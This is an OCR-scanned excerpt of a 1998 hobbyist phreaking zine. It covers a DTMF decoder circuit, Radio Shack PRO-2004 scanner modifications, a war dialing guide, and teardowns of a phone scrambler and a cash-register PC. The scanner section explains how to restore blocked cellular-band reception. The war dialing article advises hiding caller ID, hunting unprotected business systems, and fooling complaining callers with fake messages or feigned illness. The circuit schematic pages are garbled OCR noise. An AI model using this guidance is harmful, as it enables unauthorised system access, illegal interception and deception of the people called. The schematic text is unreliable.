C 1111 15 way, each time the circuit is turned on, pressing this switch
D 0000 0 will reset the registers and clear the display to all zeros . Of
course , this can be done any time the user wishes to clear the
display. Also , the shift registers have two input pins, but only
Detecting a zero one is used. The other must be pulled high by connecting it to
Vee through a 220 ohm resistor.
Next in the circuit is a pair of logic gates; a 7400 NAND gate
and a 7408 AND gate. Since the 145436 decodes the number
'0' as hex code 'A', we need to convert this to a zero for
THUD Volume ·1lssue 2· Fall 1998 29
Vcc
.. --
470 x 7 I 470 x 7 470 x 7 470 x 7 470 x 7 470 x 7 470 x 7 T
A
S I- I I-I I-I I-I I-I I-I 3 1- 1 I-I ~
""" A J\ /\ /\
vv v-
A J\ /\ " A " " " A J\ /\ /\A
"v"v"v- B J\v" v"v B "v"v"v B J\v"v"v B
~
B
"v"v"v C ~ J\v"v" v C J\v"v"v C J\v"v"v C
J\"" C J\V"V"v C
0 ~
I-I ~ E I-I I-I
0
~ -
J\v" v/\v 0 0 0 0
I-I ~
J\v"v"v- J\v"v"v J\v"v" v J\v" v"v
r:
~I I
E J\v"v"v- E
I-I J\v"v"v E
I-I J\v"v"v E
I-I J\v"v" v E E
- - -
J\" /\
-
vvv-
- -
J\v"v/\v- F J\v"v/\v- F "v"v"v F J\v/\v" v F J\v"v"v F F J\v"v/\v F
VV V G vvv- v v v G v v v G v v v G -vvv
JI"f\/'v G _ v v v
G G
~ - VVV -AJV'v -vvv -vvv -vvv -AJV'v
.:1h::. 0 ~ .:1fL 0 ~ ~ 0
yJ ~ 0
yJ "~
0
yJ ~ 0
yJ ~ 0 ~ ~ 0 ~
~ J- ~ J- 2C -.f.- ~ .L, "£ J- ~ .L. ~ J- ~ J-
~ ta., - tst .-9- '---
tst .-9-. tst
'--- ....9- tst
to- La- tst
'--- .-9- tst
'--- La- '---
tst L9-
~ -a
7447 .s.; -ou 7447 -a - ou
7447 -a -ou
7447 - a J:>u
'1: - 7447 a
I--- -ou
7447 -a -ou
7447 u.,
b
~
7447 .s..;
~ - in
-b - in - b
-in b
e--- - In b
I--- -in -b - in I--- - in -b
f--
"Sh" "h" -
c ~ "g" -
c "Sf '
f--
"f' - c "Se"
f--
"e" c
I---
"Sd"
f--
"d" c
I---
"Sc"
f--
"e" -
c "Sb"
f--
"b" f--
c "Sa"
f--
"a" -
c
~ .-9.- ~ .-9.- ~ ~ ~ ~ ~ ~ ~ .-9.- ~ ~ ~ ~
i
~
'i ~
i ~
i ~
i ~
i ~
" ~
i ~
--.
sw1
~o ~o
220 . 1 220 . 1
~ J\"" In 0 ~ ~ o ~ Vcc
I--
v v v in2
~ "1h" "2h"
1-- ~ "4h" ~ "Sh"
"1a" "1q" "2a"
~- "4a" "4~l" "Sa" "8g"
" 1b"
74164 " 1f ' "2b"
74164 "2f' "4b "
74164 ~ "8b"
74164 "8f'
"8c" "8e"
"1c" "1e" "2c" "2e" "4c"
~
"1d" "1" ~ "2d"
"2" ~ "4d" "4" $- "Sd" "8" $-
i
-elk
i
clk
r--
r f--
elk
r ~
8 digit DTMF l~ o J
,
~
I
lli o sss. ~ 0 ~
"1" "8" ~ -
1b ~
decoder display
'------'- I--'-- '---
~ ~ . --.!.Y. - 1y 4b
~ 145436 tI-B 3.579545Mhz - 7400 - -2a 7408 4y
::L 2b 3a
fl
Gl Xin - -
9
'--- c--
~ p------1 : Ain I f---
-
30 Volume 1 Issue 2 - Fa ll 1998 THUD THUD Volume 1 Issue 2 - Fall 1998 31
.
470 x 7 470 x 7 470 x 7 470 x 7 •
~
I-I I-I
J\ 1\ 1\ A
I-I I-I
A
J\ 1\ 1\ J\1\ 1\ A ......
J\vl\vl\v B
~
B
J\vl\vl\v B
J\v l\vl\v
......
J\vl\vl\v C C
~
J\vl\vl\v J\vl\vl\v C
vvv ......
J\vl\vl\v 0 o
~
0
I-I I-I
J\vl\vl\v
~
I-I I-I
......
J\vl\vl\v E E
~
J\vl\vl\v
- ~
-
......
-
J\vl\vl\v F
-
F
~
J\vl\vl\v
~
vvv ......
G G I\v"v"v G
~ ~
-1\1\ 1\
V V V V VV ......
-
~ yJ yJ yJ
~
.:1!t 0 .:19:: 0 "2f' "2e"
t--- 0 t--- 0
~ .L. ~ -t "4f'
t--- - f "4e"
t--- J-
~
tst
'--- .--9.- ~ .--9.- ~ .....9...- ~ LL-
ou .a.; .Q.I! a .Q.I! a
-ou ~
- 7447 7447 - 7447 c---- 7447
-in --L ~ --L ~ ~ ~ ~
f---
"8h" "h" -e ~ "g" -
e "8f'
t---
"f' e
I----- ~
"8e" "e" e
I-----
"~
f---
~ ~ ~ ~ " 1f'
t--- ~ " 1e"
~ ~ f---
j ~
'j '---
e
i ~
i ~
t
~ o
220 . 1
Vee
f-- J\"" In 0 Vee
I--
in2 " 1h" v v v in2 "2h"
- 1----- -
" 1a" " 1g" "2a"
~-
" 1b" " 1f' "2 b" "2f'
" 1e"
74164 "1e" "2e"
74164 "2e"
" 1d" "1" ~ "2d" "2" ~
~ ~
i j
8 digit DTMF l2: " 1"
0 J
~
,
decoder display ~Vee
DV
ATB
G1 145436 Xin
f-- 3.5795451v
- I~ c
~ P-----1 :
Fl
30 Volume 1 Issue 2· Fall 1998 THUD
Vee
-c-
~70 x7 470 x 7 470 x 7 470 x 7 T
~ ~ ~ ~
~
~
~
I-I ~
~
~
I-I ~
~
~
I-I ~
~
~
I-I
~ I-I ./\/\/\ E
I-I ~ I-I ~ I-I
- - -
v vv F
~
~
- ~
./\/\/\
vvv
G
~
~
~
~
d"
I-- 0 ~ .'1£: 0 ~ ~ 0 ~ ~ 0
yJ
d"
I-- r-!- ~ r-!- ~ -.1- ~ ...!-
~ .a., -
tst 19- -
tst .a., ~ ....9..-
.~ 7447 .s.., ~
7447 ~ ~
7447 .a., ~
7447 ~
l!!. -
b - in ~ - in ..L. ~ b
c----
~d "
-
lid" -
e
~
"8e" "e" I-
e
~
"8b" "b" -
e "8a"
>-
"a" I-
e
L9:: ~ ~ r--S!- ~ ~ ~ r--S!-
~ .s..;
j ~
j ~
j ~
.-...
sw1
~O
220 . 1
Vee
/\/\/\
v v v: in2
In 0 r--- -Vee
"4h" in2 "8h"
- f - r---
"4a" ~ "8a" "8g"
"4b" "4f' "8b" "8f'
"4e"
74164 r------
"4e" "8e"
74164 "8e"
"4d" "4" ~ "8d" "8" ~
elk ~
i i
t--
~O
I L..!1
~
1b
-Vee
-
-
~ 0
_J1>
1y
~
~
4b
2a 4y
1hz
)-
- 7400 r-- -
2b
7408 3a
- t-- - f -
; 1M 2y 3b
r r
- t-- f-----
1
t--
3y
-'--
THUD Volume 1 Issue 2 - Fall 1998 31
The completed circuit
With this simple design, an audio signal is input to the
MC145436. When the chip detects a valid DTMF code, it
ouputs the number in binary format and also sets the data
valid pin. The binary number is then sent through a small set
of logic gates that will detect a '10' (which is what the DTMF
decoder converts a '0' to) and converts it back to a '0'. The
binary ouputs from this, along with the data valid signal, go to
the shift register inputs where it is stored. The shift registers
store the last eight numbers decoded. The output of the
registers are then sent to the eight BCD to 7 segment
decoders and LED displays.
Hey Hey HEY!!! Here's our working prototype. Pretty slick,
huh? The breadboard has the 145436 decoder, the logic
Parts list
gates for detecting the '0' and the shift registers. The sub-
board at the top is a seven segement decoder display. The
(1) Motorola MC145436 DTMF decoder
three wires sticking out to the left of it are the power and
(1) 7400 quad two input NAND gate
segment test connections. It's built as a semi-permanent
(1) 7408 quad two input AN0 gate
circuit so it can be used on other projects. On the right edge
(4) 74164 8 bit serial in serial/parallel out shift register
of the breadboard you can see the huge can for the crystal.
(8) 7447 BCD to 7 segment decoder/driver
Right above that are some small buttons, one of which is
(8) common anode 7 segment LED display
hooked up as a 'clear' switch for the shift registers. That way
(56) 470 ohm resistor
when the project is powered up, I can clear the display to all
(4) 220 ohm resistor
zero's. Also on the bread board you can see a row of five
(1) 1 megohm resistor
LED's which I was using for dignostics to see the output of the
(1) 3.579545 MHz crystal "colorburst crystal"
DTMF decoder chip directly before it went to the rest of the
circuit.
Displaying the numbers
Now we have to display the contents of the shift registers. We
do this through the use of the 7447 BCD to 7 segment display
decoder/driver. This chip takes ina binary BCD input and
converts it into the correct pattern for display on a 7 segment
LED display. BCD stands for Binary Coded Decimal. Basically
it is nothing more than the first 10 binary digits (0000 through
1001) and anything higher is not decoded, at least not
properly. It is possible to get chips or make circuits that will
decode all 16 digits and display them as 0-9, A-F but we
wanted to keep this project simple and inexpensive.
So then, to display the contents of the first digit in the shift
registers, we take the A output from the first register as binary r"':"":'-:--~~~~:--~~-~~-.,..",,.....--.,..,..----.
input '1', the A output from the second register as binary input Here's a shot with the display sub-board flipped on it's back
'2', and so on to form inputs '4' and '8'. In this way we have so you can see the wiring job. It's a semi-permanent working
one BCD 'word' for input to the 7447. The 7447 is then model with all parts, including resistors, socketed. I LOVE
connected to a 7 segment LED display. SOCKETS!!! I wish every board in the world was socketed
cuz it makes it SOOO much easier to fix. Anyway, it's just a
The 7447 is designed to drive common anode displays. This point to point solder job using wire-wrap wire. I don't trust
means that it grounds an output pin when the segment is lit, wire-wrap connections so I soldered them direct. It's nice thin,
and leaves it open when it is to be off. You must use common single strand wire so it's easy to work with. The wire hanging
anode 7 segment displays. You can use common cathode off to the right on the breadboard is the audio in connection.
displays but you will need pull up resistors to make the display
work correctly. Also, the 7447 cannot sink quite a bit of Sources
current. If you connect the outputs directly to the LED's
chances are you'll drive them with too much current and blow Most of these parts can be obtained at your local electronics
them. The simple solution is place a 470 ohm current limiting supply. I do not recommend Radio Shack as about all they will
resistor in series prevent the display from frying. Of course, have is the resistors and maybe the logic gates, and the cost
this means you need 7 resistors per display, and with 8 would be prohibitive. The only compnent which you may end
displays this adds up, but 1/4 or 1/8 watt resistors can be had up having to special order is the MC145436 DTMF decoder
quite cheaply so this should not be a concem. Of course, it is chip. This is readily available through companies such as JDR
possible to make a more complex display circuit that uses Microdevices , Allied Electronics and others . Your local
only one decoder and set of resistors to drive the eight supplier should be able to order it for you if need be.
displays, but we'll leave such modifications up to the user to
try on their own. JDR Microdevices
1850 South 10th Street,
Now, you are going to want to arrange the 7 segment displays San Jose, CA 95112-4108
so that the most recent digit decoded and entered into the phone: 1-800-538-5000
shift register is on the right. This way, when a sequence of fax: 1-800-538-5005
digits is decoded, it can be read left to right as is the normal intemet: WWW.JDR.COM
way of reading numbers. This means that the rightmost digit
is actually derived from the shift registor ouputs A, and the Allied Electronics
leftmost digit is from ouputs H. phone: 1-800-433-5700
intemet: WWW.ALLlED.AVNET.COM
32 Volume 1 Issup 2 - Fall 1998 THUD
I:
•
Here's a whole bunch of mods you can do you can do to your
Radio Shack PRO-2004 scanner. First, all mods are done at
your own risk. I assume no responsibility. I do not know what
A carrier operated light
With a room full of functioning scanners, it's difficult to
:1 1.
effect they (the mods) will have on any warranty, however I determine quickly which radio is "talking." I use separate
would think they would probably void it. Also, one of the mods extemal speakers on each radio, and the spatial separation
restores coverage of the cellular phone frequencies. IT IS helps.
ILLEGAL TO LISTEN TO CONVERSA nONS IN THIS BAND! In addition to "hearing" which radio is active, I like to "see"
Read the following statement 1,000 times over which radio is active, and carrier operated lights are effective
at providing such visual cues. The idea is to illuminate a lamp
First treat the radio as if it were CMOS, that is make sure you when a signal opens the squelch. A small yellow light emitting
and it have no built up static charges. UNPLUG THE RADIO diode (LED, another Bell Labs invention) is well suited to this
FROM THE AC OR DC POWER SOURCE AND purpose. The following modification works well on all PRO-
ANTENNA!!!!!!!! Be sure to handle the sub-assembly board 2004 modes.
and cable connector CN-501 with TLC, since even the
slightest damage or minor crack in the board will result in a To add a COR light to the PRO-2004, make use of the "scan
scanner good for use as a boat anchor. control" pin (pin 13) on IC2, the TK10420 IC. Pin 13 has
voltage present only when a signal is detected. This chip
Before doing anything else . . • contains the IF, detector, limiter, and squelch circuits for
NBFM.
Take the radio out of the case by removing the 4 screws on
the back. Carefully invert the radio. If you tremble with an electric drill in your hands, read no
further. The LED can be mounted in a small hole drilled
Lets wrangle with a few diodes through the plastic front panel, just to the right of the
Locate a box-like sub-circuit. It's near the switch marked headphone jack.
"restart". The sub-circuit should be marked PC-3. Carefully
pry off the cover of the metal box. Inside there will be a 64 pin Electronically, the circuit is simple. The voltage at pin 13 is not
dip IC. This is the radio CPU. Be careful not to touch or short enough to drive the LED directly, so a general purpose NPN
out any leads on the chip. transistor (e.g., a 2N2222) can be used as a solid state
switch.
The following diodes will determine how your scanner will
work. > Pin 13 of IC2 is connected to the transistor base through a
10,000 ohm resistor.
0 -510 in circuit - scanner will have 400 memories (10 x 40)
removed • scanner will have 300 memories (10 x 30) > The emitter is grounded.
0-512 in circuit- it will step 30kHz from 825-844.995 and
870-889.995 > The collector is connected through a 1000 ohm resistor to
removed - it will step 12.5kHz from 825-844.995 and one end of an LED. This resistor limits the LED current to
870-889.995 about 13 milliamps.
0 -513 in circuit
- will not scan 825-844.995 MHz or > The other end of the LED is connected to one contact on
870-889.995 MHz the rear of the PRO-2004's on/off, volume control. This
removed - will scan all of 800 MHz band furnishes about 14 VDC unregulated to the circuit. The
back of the onloff switch has two contacts. Use the one
0-514 in circuit- scanning rate increases to 20 channels with the brown wire connected to it, as this contact is only
per second "live" when the scanner is turned on.
removed - scanning rate in 16 chlsec (alt 8 ch/sec)
11I1 WATCH POLARITY 111I If you cannot find a location, I mounted the 2 resistors and transistor on a small PC board,
count backwards from a known location. which I fastened to the PRO-2004 chassis using a metal
standoff.
Turbo Scan· Another way
A Tape Relay
Turbo scan for the 2004??? Yes!! Someone has realized that
if you replace the present 7.37 MHz ceramic resonator This mod works on the same principle: you use the same pin
CX501, with a 10.7 MHz ceramic resonator it really boosts the (13?) on the IC that you normally use for the carrier detect
scan/search speed! The present resonator is soldered light, but instead of a light being used, I used a small low
between pins 29 and 30 of the CPU (IC-503). It has been current relay. Connect the primaries of the relay in place of
confirmed that the mod works with an ordinary 10 MHz the light. You will have to determine the proper resistance to
computer crystal ($1 at hamfest) but there is a possibly wire in series, if necessary. Then connect the secondaries to
undesirable side effect. Increasing the clock rate decreases the tape recorder's "remote" jack. Depending on your tape
the resume scan delay time. The manual says delay is 2 recorder, you may need a normally open relay or a normally
seconds; with the mod, delay is <1 second. Painful if a closed. For mine, I used a very small normally open relay that
channel is filled with slow responders. There are no reports of draws about 50 ma at 12VDC that I got from one of the mail
detection problems at the increased scan rate. order houses (Jameco, I think).
The Squelch Mod
By the way, I have both the relay and the LED hooked up. I
Now, locate a sub-circuit box under the sloping front panel. It use the 2N2222 as the solid-state switch for the circuit. I also
should have many alignment holes in the top. Pry the cover put diodes in line coming from the IC to the base of the
off very carefully. Locate IC-2 in the left side of the pc board. transistor as well as one coming into the collector of the
It should be marked IC-10420. Locate R-148, a 47 K ohm transistor just for safety sake.
resistor between pins 12 and 13. Cut a lead of this resistor,
but be sure to leave enough lead on both sides of the cut to Finally. . •.
solder to. Patch in a 100K ohm resistor. Make sure there are
no solder balls or short circuits. Now your squelch will operate Make sure you re-install the metal cover and re-install the
more smoothly. radio in the case!!!!!!!!!!!!!!!!!!
THUD Volume 1 Issue 2· Fall 1998 33
Tl1c Art of War Dia1i115
bv Bachrach (Bachrach@llctrcach.llct)
For those of you who don't know, war dialing is dialing every single number within a certain
exchange, or a certain set of numbers that fit a certain criteria (like every 800 number that ends
in 1803). When doing this you are likely to find ANls, VMBs, interesting computer systems that
can be dialed into, and more. There is one story about a phreak who found and Air Force bas
computer with no password protecting it or anything, giving him full access to the base. I have
also heard stories about people finding stores with electronic signs out front that could be
changed by a computer dialing in (if you find one, make it say 'Free kevin' will you?). It's not
just that though. There is a small art to war dialing, and in this article I will try to explain that as
fully as I can.
The first thing you muxt do when war dialing is to pick a good war dialer. You could write your
own I suppose, but for somethng as harmless as war dialing using one of the other readily
availables ones is no problem. I prefer phonetag for a couple of reasons. One is that it allows
flexible templates. The other really good thing is that you can use a prefix when dialing. This
allows you to put in *67 as the prefix and no one with caller 10 will get pissed off at you and call
you back. The last reason I like it is that you can minimize it and it will run in the background
and it won't even show up on the taskbar.
The second thing you have to do when war dialing is pick an exchange. Look in the
phonebook. At the beginning iot should have a chart that says "if you are in this exchange,
then these other ones are in your area." Depending on your calling plan this may be a very
good idea. look through those exchanges. The best ones are ones that cover areas that are
largely commercial or industrial. War dialing a residential zone won't do too much good. In my
area my ISP recently got a bunch of new high speed phone lines that were in an exchange I'd
never seen before. A little more research revealed that this was a new exchange (they're
running out of numbers) that was only for businesses and other kinds of commercial
enterprises. If you have one of these in your area then this is exactly the kind of thing you want
to war dial. Nothing but goof targets just waiting for you to dial up and have them recorded in
the war dialer.
The next thing you'll want to do is figure .out the peculiarities of that exchange. Different
exchanges will have different recorded messages when you dial a number that doesn't exist.
After that message many will then have a busy toneif you don't hang up. The war dialer will
hear the busy tone and assume the number is just busy and put it back into the list of numbers
to be dialed. what you have to do is dial into that exchange a couple of times and see how long
it takes before the busy signal comes on. In my exchange it's about 15 seconds. For that
reason I set the preferences in my war dialer to only wait for fourteen seconds before giving up
on the number as a non-useful number. Trust me, doing this once can save a lot of hassle later
on.
At this point you're almost ready. it might be a good idea to get one of those phone book
CD-ROMs and put it into a sepereate list.Then remove all the numbers on that list from your
list of potential numbers to dial. In this way you won't waste a lot of time dialing peoples
homes. If you don't want to spend the money for one of these things then don't bother, it's not
the end of the world if you don't.
The last thing you may want to do is to dial the 99xx part of your exchange with the speaker on.
The 99xx part of most exchanges has interesting things like PBXs, VMS, ANACs, and possibly
just interesting numbers that generate weird tones. That's also the place where you're most
likely to find loops. For this reason you may want to be sitting next to your computer wiht a pen
and paper recording any interesting numbers that come up for later evaluation. Once you've
finished with the 99xx part of the exchange just let 'er rip. Tell phonetag to begin while you go
.read a good book. It's not a good idea to be war dialing at obscene hours of the night. I never
did wardial between 10:30 pm and 7:00 am because it's not nice to wake people up in the
34 Volume 1 Issue 2· Fall 1998 THUD
middle of the night. If you're removing all the residential numbers from a CD-ROM phone book
though, then you should be okay.
In some areas unfortunately *67 doesn't work. If this is the case then you're going to be in a lot
of trouble unless you get a phone book and remove the residential numbers. however, there
are some things you can do to minimize the damage. First it's best to just do a lot of war dialing
all at once so that all the complaints come at once , and not over the course of a couple days.
Best to just get things over with once and for all. My favorite thing to do is to change the
message on the answering machine to say something like "hello, you have reached the law
offices of Smith, Jones, and Frank. We can't come to the phone right now..." Make it a really
long message, give phony directions for getting to the office, office hours, long pauses, and
talk slowly. in that way anyone who calls will get fed up of listening to you ramble on and just
give up. you could also pretend to be a tech support line and put them on hold for
approximately twenty minutes . No one will want to wait twenty minutes so they'll just hang up.
If you don't have an answering machine then you're in for a lot more work. You could leve the
phone off the hook when you're not war dialing , or you could try and defuse the situation
yourself . Answer the phone and pretend that you have no idea what the caller is talking about.
It might also be helpful to talk in a really think accent that no one can understand what you're
trying to say. Playing a really slow guy with alzheimers could also help.The basic idea is to just
get peole to dismiss the call on their caller 10 as a fluke accident and not think about it again.
One last side note is the legallity of war dialing. I know for a fact that in some parts of Colorado
it is illegal to call someone without the intent of talking with them. A war dialer then , if caught ,
would be in trouble. Using *67 is the absolute best advice I can give to anyone though, as it will
save a lot of trouble . Check the laws in your area though. it may be useful to know what the
laws are before you start war dialing.
Sf), Y()(J "TllN'I' 'I'() sranr
mun 'TI~IIY ()"TN )II~I~'I'IN(.?
Set1d US a letter with the foliowit1Q it1fortftanot1:
• Your name (for our records)
• Your address (for your free subscription)
• Your Alias (to be published)
• Location of meeting (Address, City, State, Directions)
• Area Code of the city where the meeting is to be held
• Email address (to be published)
• Web Site (to be published)
• Time and day meeting is to be held (yep, we're going to let each meeting
have their own time/day)
Here's our very first meeting:
City/State: LasVegas, Nevada
Area code: 702
Location: WOW Superstore (Corner of Saraha/Decatur)
Host: Freaky
Email: freaky @nevadaunderground .org
Web Site: www.nevadaunderground.org
Time/Day: First Friday of each month 8:00pm
THUD Volume 1 Issue 2 - Fall 1998 35
I::::::::::::~~~:~~~::~~i:~~~~~:::::::::::]l
Here's a couple of useful items we dug up at Electronics and Computers Surplus City. First is a great little voice scrambling
device from the eighties, brand new, unused in the box. It may take a little modifying for your exact needs but performs great.
Second is a self contained 486 based computer module scrapped out of cash register machines. The computer is pretty
compact and would be great for remote or mobile applications. ECSC has a web site at http://www.eio.com/if you want more
info or see their ad on the inside back cover of this issue of THUDl
The GRE SecureTalk ST·2020 are passed through the device with no scrambling. The other
cost: about $100 four buttons , with green LED's, are the four selectable
encoding modes.
On the underside of the unit is a small panel which the user
has access to. Inside are four sets of dip switches, each one
corresponding to one of the encoding buttons topside. These
are 5 position dip switches giving each channel the choice of
1 of 32 different scrambling codes. For proper use at least
one channel of each unit must have the same settings. It is
possible to have the settings on different buttons, i.e. one
units channel 1 corresponds to the other units channel 3.
Here's a pic of the contents of the box. The unit comes with a
user manual and mounting brackets and hardware, as well as
a power adapter cord for use in a car (cigarette lighter). --= _!!iJ _~
__ . r. ~
This unit is a small box designed to hook up to a telephone
and at the touch of a button, scramble the conversation to
protect from eaves droppers. Two devices are required, one
for each person communicating. The unit which I examined
was designed for use on mobile phones. Basic specs per the
owners manual are as follows.
Closup showing the 'Normal' mode and four 'Safe' mode
Coding: buttons and LED indicators. The finish is gloss black and
4 extemally selectable codes silver, common for products from the Eighties.
32 internally selectable codes
Coding technique: Along the back side of the unit are two 9 pin D-sub
2 band frequency inversion connectors, two 4-position turn switches, a power jack, and
fuse access.
Power requirements:
9 to 14 volts DC The fuse requirements. in the manual state a .1 amp fuse;
however, on the unit itself it says .5 amp fuse. It would be
Power consumption: reasonable to replace the fuse with the one that comes with
100mA in secure mode the unit. In the ones that I examined there were standard 125v
10mA in normal mode .5amp fuses.
W x H x 0:
7 x 14 x4 inches
177 x 35 x 100 mm
Weight:
380g
. .
rl ~; ;;;T;;:,wr'l\!
O.84lbs
Fuse: .•
100mA
The unit comes with a users manual and power adapter to
!.
-. -
&c .. :if", "'~ -" 'Affi4 wl. j{iS~\!" ~~'fi sc " ~
4:
connect the unit to a cars cigarrette lighter socket. The two
units I examined did not come with cables to hook the unit to
the phone. For mobile use the unit comes packed with
mounting brackets and screws.
Here's a shot of the belly of the beast...errr....the underside of
The unit is connected between the phone base and the the scrambler. The access panel has been removed to show
handset. The diagram in the manual shows it connected to a the four sets of dip-switches for selecting the individual
standard household phone and connection in a mobile unit is scrambling codes for each of the 'Safe' channels.
similar.
The unit has five buttons each with it's own LED to indicate The turn switches allow the user to adjust the input 'mic' level
the current operating mode. One button is for normal mode and the output level. There are only four positions to each but
and is indicated with a red LED. In this mode communications I found that the range is more than adequate.
36 Volume 1 Issue 2· Fall 1998 THUD
The power conenctor is the common type found with most
small device wall transformers . The input requirements are 9
to 14 volts DC. The tip is positive with the sleeve being
ground .
The two D-sub connectors are what connects the unit
between the base and handset. The manual did not have any
pinouts so I had to open up one of the devices and do a little
reverse engineering. What I found was pretty simple. Most of
the connectors simply pass through the unit from one
connector to the other. These connections are probably for
control and power signals being channeled to the handset
from the base. Two pins on each connector are used for the
audio.
The connectors are one each male and female . The r:=---:---,--,,.----=---,-----;-:------:--,------,-,.---::--:----::::-::----,--,
connection to the base, marked 'main' is female, requiring a Backside of the scrambler showing the 9-pin
connectors, mic and speaker volume adjusts ,
cable with a male end. The other connector, marked 'handset'
is female, requiring a cable with a male connector. connector, and fuse holder.
It is apparent from the manual that version of the unit exist
The pinouts are fairly simple. It should be noted however that with connectors for standard in house telephones.
the audio input on one conector comes out the other Connections for these are probably different and may just be
connector. It is meant that the mic and speaker are on standard phone jacks .
seperate lines.
The device can easily be adapted to any number of
pin main handset 5 in1 out1 application requiring scrambling of communications. All that
1 X pass through X 6 X pass through X would be required would be the appropriate adapters. In my
2 X pass through X 7 X pass through X testing of the units I found that in scrambling mode there was
3 X pass through X 8 X pass through X a significant change in the sound quality, although not enough
4 ou12 in2 9 GND GND to hinder scrambled communications . In normal mode the
sound is completely unchanged as it simply passes through
the device.
The PSI POS System unit Model 1
cost: about $50
This small aluminum box is a self contained motherboarded
PC compatible computer. It contains a power supply,
backplane motherboard , CPU board and what appears to be
a LAN card. It was designed to be used in point of sale (POS)
cash registers similar to the computerized cash registers one
finds in large department stores . The device can be made to
work as a stand alone computer with only minor
modifications.
Upon application of power it is immediately apparent that the
unit comes with a 486 SLC/2 processor and 4 megs of RAM.
The BIOS is a modified Chips & Technologies BIOS v3.0.
Pressing CTRL-ALT-S will bring the user to a fairly standard
BIOS setup program where one can set the usuall date/time ,
floppy/hard drive, and other parameters .
Allowing the machine to continue it's bootup procedure brings
r=:-:--,---:;----;:--:----:-:--------;----;--:;--:;;:---,---~ the user to a prompt which leads to a series of questions .
This is the whole unit, power supply and all. The two cards
that come with the unit have been removed so you can see 1>"Run Off Line Test 1=Yes 2=No"
them better. The card on the right is the CPU card wiht the If there is no input within 5 seconds the BIOS assumes NO
four SIMM slots and massive connector for access to com and continues to the Boot From Lan question further down
ports, etc. The card on the left is the LAN card. this list.
If you select YES you get:
SPECS:
2>"Select Options 1=Diag 2=SetID"
HxWxL
Set ID is to set the unit number on the LAN for all the
37/8 x 5 x 19 1/2 inches
registers.
Power
Selecting Diag will bring you to step 3 below otherwise
100-130v AC at 2.5A
selecting
External connections
Set ID brings the user to:
4 9-pin D-sub connectors for COM 1 thru COM4
1 5-pin DIN connector for standard 101 keyboard
2a>"Set TerminallD? 1=Yes 2=No·
1 25-pin D-sub connector for parallel port/printer
Selecting NO will bring the user back to the Select
1 15-pin D-sub connector VGA monitor
Options prompt. Selecting YES yields:
1 RCA connector for external speaker
1 4 pin power connector
2b>"TerminaIID = 128 1=OK 2=Up 3=Down"
THUD Volume 1 Issue 2· Fall 1998 37
Up increments the user 10, Down decrements the user 9>"Select Again 1=Yes 2=No"
10. OK accepts the selectued user 10 and goes to the It's not immediatly apparent what this is for but after soem
next prompt: simple trial and error I found that is was simply asking if the
user wants to run through the menu sequence again.
2c>"Update CMOS [xxx)1=Yes 2=No" Selecting YES brings the user back to line 2 above.
This asks the user to confirm the selected user 10 and to Selecting NO displays "Leaving test mode, terminal will
store it in the CMOS. Upon exiting this the user is reset" and does so.
brought to the Select Again option at step 9 below.
3>"Test 2 Line Display 1=Yes 2=No"
Apparently the cash register this computer is designed for
has a small two line alphanumeric display. Presumably this
is the price display. Selecting YES will send a test stream
of data to the display for a few seconds and displays on the
monitor the message "Sending test data to the two line
display" . I would guess that this is actually sent to one of
the COM ports although I was unable to confirm this.
4>"Test POS Printer 1=Yes 2=No"
This is to test the receipt printer. Selecting YES sends test
data to the printer and displays on the monitor "Sending
receipt & journal print data to the POS printer". Again this is
probably sent through one of the four COM ports.
5>"Read KB data 1=Yes 2=No"
A keyboard test. I'm not sure if it's to test the 101 keyboard Screen shot of the BIOS setup. It's just like any other PC
or another one hooked to the register. Selecting YES BIOS you'll find on other 486 type computers.
displays the message "Any key to test - 2 key 3 times to
exit". I tried this and anything I typed on the keyboard was
echoed to the screen. The exit trick is kinda strange but just After going through the above menus the system continues a
pressing the number 2 three times in a row exits just fine. standard BIOS bootup procedure. You do not have to go
through any of the menus. If you do not answer the questions
6>"Read MSR data 1=Yes 2=No" within 5 seconds the comput just goes along on its merry way
Ah, the magnetic stripe reader. This allows the MSR to be and continues to boot.
tested. Selecting YES displays "Swipe card to test MSR
read". The computer will just sit there waiting for you to Next the computer prompts "Boot from LAN? 1=Yes 2=No". If
swipe a card. Since the unit does not come with an MSR you answer NO or wait five seconds the computer continues
reader, I tried the "222" keyboard sequence and was able a normal boot sequence. Otherwise it attempts to boot from
to exit this routine. The MSR is probably hooked up to one the LAN. Not being hooked up to a LAN the computer
of the COM ports. eventually displays Over 1.25 PSI ROM complete - loading!!"
and sits there. Obviously nothing is going ot happen if it's not
7>"Test Speaker 1=Yes 2=No" hooked to a LAN. The LAN card is made by DCNS inc, part
Just a simple speaker test. Selecting YES beeps the number 42-0701D.
speaker three times. Sorry, no 5.1 DTS test track here.
The computer is a backplane motherboard type with four
8>"Test Cash Drawer 1=Yes 2=No" 16-bit slots. The unit comes with two slots filled, one a CPU
This function, if selected will display "Sending command to card, the other a LAN card. The case is a bit cramped. In fact
open cash drawer". I suppose that this is also connected to one of the slots is so close to the edge of the board that the
one of the COM orts.
III~ ALL'I'OA'I' YOlJ CAN III~
Blacklisted! 411
The Official Hackers Magazine
Tired of the same old thing?
NOW you have a choice!
Published by Syntel Vista, Inc.
We 're in our 5th year, now! Join the thousands of other happy hackers
around the world! Take a look at our rag!"
Hacking/Phreaking ./ BBSllnternet Updates/News
Telephone Technology ./ The Underground
Cable Television Technology ./ Sovereign Citizenship
Satellite Communications ./ Pirate Radio
Radio Communications ./ Sources
AudioNideo/Computers ./ Survival Guide
Encryption & Virii ./ Hardware Hacking....and
We publish reader questions and article submissions.
Got something to share with the hacker community?
We're your resource AND your means to communicate with
fellow hackersl
Blacklisted! 411, P.O. Box 2506, Cypress, CA 90630
Office (909)738-0406 Fax (909)738-0509,
Subscriptions are $201yr U.S ., $241yr Canada, $35/yr Foreign (U.S . Currency)
Samples are $5 each (most current issue unless otherwise requested)
NOTE: W.·.. a uan. z/n• • we on uan.r.
38 THUD
aluminum case would touch the back side of any cards put
into that slot, shorting out the pins. Memory backup is held
with an external lithium battery pack.
---""11.:'
Closup of the CPU and LAN cards. Note the huge connector f-- - - -- - - - - - - - - -- - - - - - - - - '
on the CPU card at the right. This connects to a ribbon cable
which connects to all the com, video, and sound ports.
I decided to see if I could use this computer in a normal way
by hooking up floppy or hard drives. I took out the LAN card
and installed an extra ATIO card I had laying around. I had
some trouble getting the card into the cramped box. I had to
remove one of the locking nuts on the external connectors to
the card in order to have enough clearance to slip the card I must point out that in order to hook up the external drives, I
needed to make a small modification for proper power. The
into it's slot. This card provides an IDE hard drive and a floppy
